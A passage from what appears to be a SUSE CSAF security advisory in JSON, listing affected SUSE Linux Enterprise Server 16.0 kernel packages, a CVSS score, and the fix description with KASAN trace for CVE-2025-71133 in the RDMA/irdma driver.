"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
